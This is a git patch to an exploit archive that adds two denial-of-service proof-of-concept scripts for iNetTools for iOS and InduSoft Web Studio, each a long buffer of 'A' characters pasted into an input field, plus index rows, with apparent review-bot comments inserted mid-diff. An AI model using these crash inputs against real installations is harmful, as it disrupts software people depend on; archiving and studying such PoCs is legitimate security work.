From 5543ae6e2e1dad00d0e6cd72ba1bad4ba11792e6 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 27 Nov 2019 05:01:43 +0000
Subject: [PATCH] DB: 2019-11-27 2 changes to exploits/shellcodes iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC) InduSoft Web Studio 8.1 SP1 - _Atributos_ Denial of Service (PoC)
---
 exploits/ios/dos/47716.py | 25 +++++++++++++++++++++++++
 exploits/windows/dos/47717.py | 33 +++++++++++++++++++++++++++++++++
 files_exploits.csv | 2 ++
 3 files changed, 60 insertions(+)
 create mode 100755 exploits/ios/dos/47716.py
 create mode 100755 exploits/windows/dos/47717.py
diff --git a/exploits/ios/dos/47716.py b/exploits/ios/dos/47716.py
new file mode 100755
index 000000000..f55a313f0
--- /dev/null
+++ b/exploits/ios/dos/47716.py
@@ -0,0 +1,25 @@
+# Exploit Title: iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC)
+# Discovery by: Ivan Marmolejo
+# Discovery Date: 2019-11-25
+# Vendor Homepage: https://apps.apple.com/mx/app/inettools-ping-dns-port-scan/id561659975
+# Software Link: App Store for iOS devices
+# Tested Version: 8.20
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: iPhone 6s iOS 13.2
+
+# Summary: iNetTools is a suite of network diagnose tools on iPhone and iPad. It provides essential tools such as
+# Ping, DNS Lookup, Trace Route, Port Scan, Whois, Server Monitor, and Lan Scan.
+# Steps to Produce the Crash:
+
+# 1.- Run python code: iNetTools.py
+# 2.- Copy content to clipboard
+# 3.- Open "iNetTools for iOS"
+# 4.- Go to "Whois"
+# 5.- Paste ClipBoard on "Domain Name"
+# 6.- Start
+# 7.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 98
+print (buffer)
\ No newline at end of file
diff --git a/exploits/windows/dos/47717.py b/exploits/windows/dos/47717.py
new file mode 100755
index 000000000..7eed53148
--- /dev/null
+++ b/exploits/windows/dos/47717.py
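Review bot: In exploits/ios/dos/47716.py the `#!/usr/bin/env python` line is added line 22 of a file created with mode 100755, so it is only a comment and running the file directly hands it to the shell instead of Python; it belongs on line 1, above `# Exploit Title`. exploits/windows/dos/47717.py has the same problem at added line 28. The header also stops at the tested version (8.20) and gives no cause or fixed release, which is what someone triaging the entry needs. I would add `# Root cause: not analysed; the input is one 98-character label, above the 63-octet DNS label limit` and `# Fixed in: unknown at time of publication`, worded as open questions because the hunk shows only the payload length and not why the app stops.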
@@ -0,0 +1,33 @@
+# Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos" Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 2019-11-23
+# Vendor Homepage: http://www.indusoft.com/
+# Software Link : http://www.indusoft.com/Products-Downloads
+# Tested Version: 8.1 SP1
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos" 'No Redibujar'/'Deshabilitados' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Google Dork: chuyrojas1997@gmail.com: chuyreds
+# Discovery Date: 23-11-2019
+# Vendor Homepage: http://www.indusoft.com/
+# Software Link : http://www.indusoft.com/Products-Downloads
+# Tested Version: 8.1 SP1
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to Produce the Denial of Service:
+# 1.- Run python code: InduSoft Web Studio Edition 8.1 SP1.py
+# 2.- Open InduSoft "Web Studio Edition 8.1 SP1.txt" and copy content to clipboard
+# 3.- Open InduSoft Web Studio Edition 8.1 SP1
+# 4.- On Graficos slect Atributos
+# 5.- Paste ClipBoard on "No Redibujar"/"Deshabilitados" and click on "Aceptar"
+
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 1026
+f = open ("InduSoft Web Studio Edition 8.1 SP1.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index d8d22421f..612098bb4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
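Review bot: The header of exploits/windows/dos/47717.py carries two metadata blocks (added lines 1-8 and 10-18) that disagree: the titles differ, the discovery date is `2019-11-23` in one and `23-11-2019` in the other, and the `# Google Dork:` field holds an e-mail address rather than a search query. Keeping a single block with the fuller title and the ISO date, and moving the address to a `# Contact:` line or dropping it, would give indexers one source of truth; the row added to files_exploits.csv uses a third spelling of the title (`_Atributos_`). Step 4 also has the typo `slect`. The file write at the end would be tidier as `with open("InduSoft Web Studio Edition 8.1 SP1.txt", "w") as f:` followed by `f.write(buffer)`, so the handle is closed even if the write raises.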
@@ -6607,6 +6607,8 @@ id,file,description,date,author,type,platform,port
 47707,exploits/windows/dos/47707.txt,"Internet Explorer - Use-After-Free in JScript Arguments During toJSON Callback",2019-11-22,"Google Security Research",dos,windows,
 47709,exploits/windows/dos/47709.py,"SMPlayer 19.5.0 - Denial of Service (PoC)",2019-11-25,"Malav Vyas",dos,windows,
 47711,exploits/windows/dos/47711.py,"InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)",2019-11-25,chuyreds,dos,windows,
+47716,exploits/ios/dos/47716.py,"iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC)",2019-11-26,"Ivan Marmolejo",dos,ios,
+47717,exploits/windows/dos/47717.py,"InduSoft Web Studio 8.1 SP1 - _Atributos_ Denial of Service (PoC)",2019-11-26,chuyreds,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,